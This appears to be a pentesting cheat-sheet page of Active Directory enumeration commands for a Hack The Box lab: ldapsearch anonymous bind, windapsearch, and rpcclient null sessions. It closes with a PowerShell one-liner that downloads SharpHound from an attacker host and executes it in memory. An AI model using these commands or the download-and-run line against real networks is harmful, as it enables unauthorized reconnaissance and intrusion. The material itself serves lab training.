Tools

LDAP

ldapsearch

To check if anonymous binds are allowed, you can perform a simple LDAP bind operation without providing any credentials and see if it succeeds or fails:

ldapsearch -H ldap://10.10.10.161 -x -b 'dc=htb,dc=local' -s base

# -x for anonymous auth, -b to specify base DC, -s for scope

windapsearch

If LDAP is open, we can enumerate users, computers, and groups using windapsearch

windapsearch -d htb.local --dc 10.10.10.161 -m users --attrs samaccountname | grep -i samaccountname
windapsearch -d htb.local --dc 10.10.10.161 -m computers
windapsearch -d htb.local --dc 10.10.10.161 -m groups | grep cn | awk -F\: '{print $2}'

RPC

If RPC is open, we can enumerate users, computers, and groups.

# Connect to RPC anonymously
rpcclient -U "" -N 10.10.10.161

# Enumerate Users
rpcclient $> enumdomusers

# Enumerate Groups
rpcclient $> enumdomgroups
 group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
 group:[Domain Admins] rid:[0x200]

# Query Group
rpcclient $> querygroup 0x200

# Query Group member
rpcclient $> querygroupmem 0x200

#Query User
 rid:[0x1f4] attr:[0x7]
rpcclient $> queryuser 0x1f4

BloodHound

Upload SharpHound to collect data.

iex(new-object net.webclient).downloadstring("http://10.10.14.9/SharpHound.ps1")

PreviousCRTP Lab 13NextPowerShell

Last updated